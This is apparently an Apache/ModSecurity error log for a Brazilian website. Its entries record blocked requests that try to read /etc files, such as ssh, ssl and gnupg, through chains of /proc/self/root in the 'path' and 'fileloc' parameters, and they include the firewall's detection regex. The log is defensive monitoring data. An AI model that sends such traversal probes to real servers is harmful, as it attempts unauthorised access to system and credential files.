[Tue Mar 17 11:00:17.825904 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.203:52520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablecQeiSKl8TjouI-YJ-wAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:00:31.751318 2026] [:error] [pid 8298:tid 140411691570944] [client 74.7.243.203:45968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablef5dzf3e7m9lz3ZHO-wAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:33.179477 2026] [:error] [pid 8555:tid 140411582465792] [client 74.7.243.203:51622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablegc36KAxay5pmeQfDjgAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:36.055239 2026] [:error] [pid 9155:tid 140411607643904] [client 74.7.243.203:51624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablehNbI7zhHXcabyMUuQgAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:40.747194 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.241.46:41944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableiO82sZHvlq4xgHrM1AAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:41.065536 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.243.203:51636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableiat8Nd0UC_OcbVG5JAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:42.965630 2026] [:error] [pid 8856:tid 140411716749056] [client 74.7.243.203:60576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableinUHeC6oxrTQ0VC3GQAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:49.143470 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.203:60584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablekQeiSKl8TjouI-YKBwAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:51.876986 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.203:52064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablekweiSKl8TjouI-YKCgAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:53.263960 2026] [:error] [pid 1016:tid 140411699963648] [client 74.7.243.203:52078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablelZqmL8PQht4WJFlQSQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:54.593440 2026] [:error] [pid 8298:tid 140411574073088] [client 74.7.243.203:52090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablelpdzf3e7m9lz3ZHPAAAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:57.385609 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.243.203:52100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablemTarLhPAjZGI1b226gAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:58.763338 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.243.203:52106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablemr-sgTmmJoPuMdynewAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:00:59.998647 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:52108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablem9CmCSWTlPouqorVEQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:01.427254 2026] [:error] [pid 18604:tid 140411649607424] [client 74.7.243.203:33154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablenUBd0UqwxWindINxUgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:04.103963 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.243.203:33156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablen6t8Nd0UC_OcbVG5KQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:05.670004 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:33160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableoQeiSKl8TjouI-YKCwAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:06.934651 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.203:33176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableoqBJNF7axNlVR0UFRAAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:09.559518 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.243.203:33188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablepaBJNF7axNlVR0UFTAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:10.879418 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:43186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableptCmCSWTlPouqorVGAAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:12.131187 2026] [:error] [pid 8555:tid 140411607643904] [client 74.7.243.203:43188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableqM36KAxay5pmeQfDlQAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
